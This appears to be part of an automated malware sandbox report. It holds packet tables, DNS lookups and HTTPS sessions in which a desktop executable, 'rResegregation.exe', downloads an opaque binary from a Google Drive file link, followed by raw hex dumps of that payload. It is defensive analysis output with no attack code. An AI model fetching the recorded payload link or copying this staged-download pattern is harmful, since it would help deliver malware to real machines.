                                                                Feb 28, 2024 13:26:24.560559988 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.560837984 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.560892105 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.561182976 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.563060045 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.563278913 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.563333988 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.563657045 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.565862894 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.566061974 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.566124916 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.566417933 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.568620920 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.568844080 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.568906069 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.569247007 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.571382046 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.571671009 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.571726084 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.572005987 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.574024916 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.574213982 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.574282885 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.574501991 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.576829910 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.576994896 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.577074051 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.577296972 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.577351093 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.577624083 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.579482079 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.579720974 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.579778910 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.580108881 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.582230091 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.582403898 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.582475901 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.582675934 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.585011959 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.585247993 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.586369991 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.586575031 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.586635113 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.586893082 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.589106083 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.589409113 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.589463949 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.589749098 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.591496944 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.591674089 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.591744900 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.591953993 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.593883991 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.594077110 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.594151974 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.594387054 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.594440937 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.594703913 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.596266985 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.596530914 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.596599102 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.596890926 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.598685980 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.598860979 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.598936081 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.599139929 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.600941896 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.601233959 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.601288080 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.601584911 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.603259087 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.603437901 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.603504896 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.603739023 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.605451107 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.605633974 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.605705023 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.605922937 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.607722998 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.607884884 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.607956886 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.608175993 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.610038996 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.610236883 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.610313892 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.610615969 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.610670090 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.610908985 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.612220049 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.612421989 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.612492085 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.612761021 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.614404917 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.614592075 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.614656925 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.614936113 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.616466045 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.616630077 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.616695881 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.616905928 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.618572950 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.618773937 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.619704962 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.619930983 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.619985104 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.620270967 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.621784925 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.621998072 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.622056007 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.622251034 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.623922110 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.624130964 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.624193907 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.624376059 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.624445915 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.624630928 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.624654055 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.624680042 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.624721050 CET44350223142.250.72.225192.168.11.20
                                                                Feb 28, 2024 13:26:24.624902010 CET50223443192.168.11.20142.250.72.225
                                                                Feb 28, 2024 13:26:24.624902010 CET50223443192.168.11.20142.250.72.225

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Feb 28, 2024 13:26:21.329324961 CET5457953192.168.11.201.1.1.1
                                                                Feb 28, 2024 13:26:21.486140013 CET53545791.1.1.1192.168.11.20
                                                                Feb 28, 2024 13:26:22.272418022 CET5672553192.168.11.201.1.1.1
                                                                Feb 28, 2024 13:26:22.436706066 CET53567251.1.1.1192.168.11.20

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Feb 28, 2024 13:26:21.329324961 CET192.168.11.201.1.1.10xfe1dStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                Feb 28, 2024 13:26:22.272418022 CET192.168.11.201.1.1.10xa222Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Feb 28, 2024 13:26:21.486140013 CET1.1.1.1192.168.11.200xfe1dNo error (0)drive.google.com172.217.12.142A (IP address)IN (0x0001)false
                                                                Feb 28, 2024 13:26:22.436706066 CET1.1.1.1192.168.11.200xa222No error (0)drive.usercontent.google.com142.250.72.225A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • drive.google.com
                                                                • drive.usercontent.google.com

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.11.2050222172.217.12.1424435024C:\Users\user\Desktop\rResegregation.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-02-28 12:26:22 UTC216OUTGET /uc?export=download&id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                2024-02-28 12:26:22 UTC1582INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Wed, 28 Feb 2024 12:26:22 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-dbdk2SbPZA1qyVdbEom0Yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.11.2050223142.250.72.2254435024C:\Users\user\Desktop\rResegregation.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-02-28 12:26:22 UTC258OUTGET /download?id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2024-02-28 12:26:23 UTC4693INHTTP/1.1 200 OK
                                                                X-GUploader-UploadID: ABPtcPqsWbDQ_vy00509DFsnnML2MzHcNyvUZiGGK7E28XiY0zL1gnJcQRs2SWh5_w9UxewwnmBEXomw6Q
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="YUMHfNEXOoJa168.bin"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 273984
                                                                Last-Modified: Tue, 27 Feb 2024 10:01:37 GMT
                                                                Date: Wed, 28 Feb 2024 12:26:23 GMT
                                                                Expires: Wed, 28 Feb 2024 12:26:23 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=svF81w==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close
                                                                2024-02-28 12:26:23 UTC4693INData Raw: 35 67 8f b7 40 07 f1 b2 19 4d 94 43 fd 94 c1 8c 65 13 03 1a 95 3a 37 c6 d4 85 c7 48 cb 48 df 27 71 20 98 8b ce b3 fb 09 00 9d ef cd fd 78 88 29 de b6 a6 e2 36 bc 0e 71 9e 53 b5 9e 51 91 d7 b8 13 26 5b e4 ba bc 1e 16 38 d2 01 c9 91 d7 ba 20 da b1 4d 56 a4 14 fb e9 0f 9b ac 8a 83 b1 28 a7 ae 9f a9 6d 0f f2 77 5e c5 99 67 cc b9 82 32 e5 33 09 1b b1 55 51 31 41 89 c4 37 bb 66 fa 76 5e ca 4e 69 c2 1e 3c 87 e2 6f 31 4f d8 80 3e 78 c0 d6 ca 32 29 d6 a2 06 fa 25 bd 1c c1 ee 55 5d d8 e4 94 24 1d 59 4f e8 e7 b5 e5 28 0f ce 3d 9a b3 3c a9 51 b2 ac cc 76 c8 ab 30 f5 4b 17 0a e4 6d ed 4b cc be 20 fb b2 ae 88 fb 89 e2 d8 0b ec ec 45 02 82 c3 1c 92 83 98 fd cf 32 43 31 c1 11 5c 68 ed 23 af 2c 97 01 d4 f4 f0 07 df 13 6b 0e ce 3c eb 49 d3 70 f9 e3 b7 34 0e b6 a0 15 0d ac
                                                                Data Ascii: 5g@MCe:7HH'q x)6qSQ&[8 MV(mw^g23UQ1A7fv^Ni<o1O>x2)%U]$YO(=<Qv0KmK E2C1\h#,k<Ip4
                                                                2024-02-28 12:26:23 UTC4693INData Raw: 89 c8 d2 e4 13 30 df b0 6b c3 4a 71 f1 a6 e6 b2 e6 87 c9 fa 72 d0 1a 2f d9 79 0f 25 88 fe fb 99 d6 b6 f4 cd 6f 28 aa b9 c8 b7 37 b7 7a d5 df b2 59 50 5e 51 d4 e9 3e bd 5f 1c d6 9e 8c d8 ba cd 05 83 28 27 02 72 54 a2 9d 0b 3a ae e0 1c 23 04 cc 58 ac eb 45 3a 06 c0 e2 05 48 60 62 33 ad 08 91 7d 2a 88 40 64 89 fc 0b e2 e3 d4 5a 89 72 e8 44 76 e6 dd da 34 44 24 25 96 76 f6 0f 4b 00 07 17 21 ba 9a 12 d3 0f c5 48 b7 00 ce ec 4f c0 f5 e8 2b 7d e8 fb 4a b9 71 ea 02 6d ac 6f cc 86 c0 a1 46 0a 99 31 25 88 66 4b c0 c9 d8 b3 41 6e 34 2a ac e2 b8 4d 64 c3 b2 ac a5 de 90 06 9d 57 25 2b 41 0e 82 af f1 1f 6c 4c 1f fb 6c 18 44 41 0d 4b 27 29 7c 71 73 c8 11 8b ac b0 94 59 9a a0 aa 85 fd ca b5 f4 08 7e e1 a8 3e 76 a9 61 7b e7 86 77 e4 c5 ea 01 9d ca 08 97 b4 4f 28 44 85 e1
                                                                Data Ascii: 0kJqr/y%o(7zYP^Q>_('rT:#XE:H`b3}*@dZrDv4D$%vK!HO+}JqmoF1%fKAn4*MdW%+AlLlDAK')|qsY~>va{wO(D
                                                                2024-02-28 12:26:23 UTC1942INData Raw: b0 47 40 c8 dd a5 5d ae 88 31 ed a7 89 8c b3 8a 46 ce fc 61 8f fa 29 66 e5 d0 95 93 8b 65 1c 77 82 90 25 25 c1 11 ea 20 3d ec fd 94 8b 4e 73 ef 87 c0 0f bb fd 01 8e 6c 44 8f 33 15 4e 95 bc 23 97 c0 88 a6 bd 41 5f 25 f1 ec 35 28 34 84 c7 68 e4 f9 74 a4 09 2f 76 10 a9 66 df c8 b2 51 1e 0f ef de 16 c0 55 5e b3 a9 6e c4 fd a5 53 df ec 3e 01 78 e0 77 43 71 59 6f 60 7e ac 98 d5 78 93 1b 98 a4 75 ef 68 28 9c 64 90 e5 a7 47 87 8f 6d 3a a0 1a dc cf cd b9 b0 3b 82 6e bd 7e a3 bb 43 b5 85 45 8e e2 80 01 6f f8 0b a5 c8 22 e9 fc 06 c4 95 58 a8 16 6c 3d 92 7c cd 31 56 12 05 6e 3e 87 53 fd 82 b4 f3 d8 a3 aa 77 32 6a 76 8b 55 86 23 4f c5 c6 aa 49 01 78 52 fc 31 c1 f7 d2 3c 80 b4 4d e5 39 ae 55 ba d5 95 4a c5 1e 46 10 30 00 76 c4 b0 22 25 30 00 fa 02 67 47 f7 52 43 06 e8
                                                                Data Ascii: G@]1Fa)few%% =NslD3N#A_%5(4ht/vfQU^nS>xwCqYo`~xuh(dGm:;n~CEo"Xl=|1Vn>Sw2jvU#OIxR1<M9UJF0v"%0gGRC
                                                                2024-02-28 12:26:24 UTC1252INData Raw: 73 3c 0e f4 c5 39 b5 d5 e6 7b 7c 7c 11 50 49 2b 99 61 d4 17 a5 c7 d6 80 a3 74 a4 3a 76 c0 ab a6 b3 ae 62 c0 aa 37 c8 9a 46 93 00 20 ad 82 13 80 a6 d1 34 da 78 e1 d3 4b 78 24 13 86 b3 48 05 8e 1c 23 4a 6c d0 1a 27 98 4f 73 ef ba 28 a7 ae 9f 11 14 16 7e 75 a9 2c 48 9d 47 73 43 db fa 30 c3 6e 5f ed cc b3 d6 da 33 d8 7a 24 fc fd a4 05 be cc cf e4 fd 63 a4 0b 81 c5 d4 41 96 69 54 34 46 aa 3e c2 ab 07 7f aa 01 c6 29 7d fa dd a8 93 46 33 96 26 63 c6 c8 1e 4d 63 2c 8a 72 49 ea 54 8e b6 1f 7e 81 0e c1 0c f1 f0 ca ee 34 9b 6d 94 36 21 95 58 67 5e b8 e8 58 b5 87 8a 9e aa 91 b6 01 7f bb ca 73 08 4f e5 69 98 e3 5b 92 80 14 2a 09 88 5c 47 4e e8 27 a6 99 ed ea ce cc 2c d9 6a 8b 49 d3 b7 bc 0f 69 39 4b b6 29 2c f8 24 eb 45 b0 8d 2f 76 85 9f f2 e8 ac cd 7b 1e ce 02 6a 04
                                                                Data Ascii: s<9{||PI+at:vb7F 4xKx$H#Jl'Os(~u,HGsC0n_3z$cAiT4F>)}F3&cMc,rIT~4m6!Xg^XsOi[*\GN',jIi9K),$E/v{j
                                                                2024-02-28 12:26:24 UTC1252INData Raw: 2d a0 7c ff a1 ee eb 7a 7a 17 21 5d f9 2c bd ba 89 3a 33 99 22 42 d3 c7 03 1d 9c ef e4 7a 2c a5 9a df 05 f0 87 41 94 72 56 0f e2 15 69 d9 41 0f fa e7 db f0 ce 08 70 a7 eb 78 cc 1b d8 86 07 63 4d e0 63 c0 19 41 85 32 f8 08 0e b1 0c c3 16 a0 e9 ae 66 5b 70 fe a6 30 9c 58 df 6a 6c 87 0d dd b4 3f ab 0c d5 f7 4f df cd 2a ea c6 4a e4 bb 33 d4 8f d6 37 23 3b 40 55 6a c8 db ee b7 fe de ba 15 83 24 88 aa 8e 52 b2 9c b0 3e 1a b4 da 3f 58 6c 01 8b be 80 78 b9 fa cd e8 58 34 84 ca db b7 e0 63 41 a7 79 a3 4c 42 76 84 90 0d a7 a9 ac db e8 be b2 7e ca 04 e2 1c 6f d8 c3 04 c3 85 3d 3e 11 b6 0a cb a9 67 63 8f 2c 7e 99 45 eb e6 1f 9f 8f 9b 64 d6 33 b8 1f 29 18 4a 82 4a d1 81 f5 3e 3b ef 4b fe 1e cb 1a e5 bb db f8 3d 9b d8 d1 54 83 3b 64 f3 83 01 83 34 cf fc 15 b5 bf 4b e1
                                                                Data Ascii: -|zz!],:3"Bz,ArViApxcMcA2f[p0Xjl?O*J37#;@Uj$R>?XlxX4cAyLBv~o=>gc,~Ed3)JJ>;K=T;d4K
                                                                2024-02-28 12:26:24 UTC1252INData Raw: 23 33 fa b6 24 7c 2f de f4 25 e1 f5 55 e9 b8 b0 70 69 37 ea 3e 23 1b 58 56 84 bd 6f 33 67 0c 27 88 f0 67 15 6e bc 0e 4e 08 20 41 c7 5c 01 01 51 0d ec 9d bf e8 dc 73 ff c2 9c df c4 e8 dc 7b 87 8f 08 6f 6c 3c a2 11 f2 0f e7 d6 76 36 82 c6 6f 66 55 75 52 bc 6c 53 ed f1 62 94 83 63 87 ce 1c 14 79 9e 72 7d ff 4c 76 26 d4 fd 18 0e 13 7e 7d 3a ce b6 f3 ca 7f 5c d9 15 78 db cd 77 33 4d fd 4f c4 46 24 38 4a 6c 35 28 bf 5d 98 28 e1 c3 8e ed b1 0c 7c 53 f7 ab dc d2 cd 84 56 60 da b3 8c 32 e9 e5 15 4c 85 e5 f8 19 df 17 4d 6e d0 a0 2c 02 d9 d4 ca 7b 66 de 61 54 1a 72 42 24 20 a8 3b 9e 15 87 8b 2b b5 87 26 17 1a f0 68 17 c3 3c 40 1f 08 5f 3f fa 9e 02 e0 13 19 e5 48 e2 a5 57 9c fe 8b 64 44 28 84 dc dd 70 ea 24 4a 9a 72 41 8c 57 9c 22 b9 11 b3 8d 86 4a 5b af 83 cf 6b a4
                                                                Data Ascii: #3$|/%Upi7>#XVo3g'gnN A\Qs{ol<v6ofUuRlSbcyr}Lv&~}:\xw3MOF$8Jl5(](|SV`2LMn,{faTrB$ ;+&h<@_?HWdD(p$JrAW"J[k
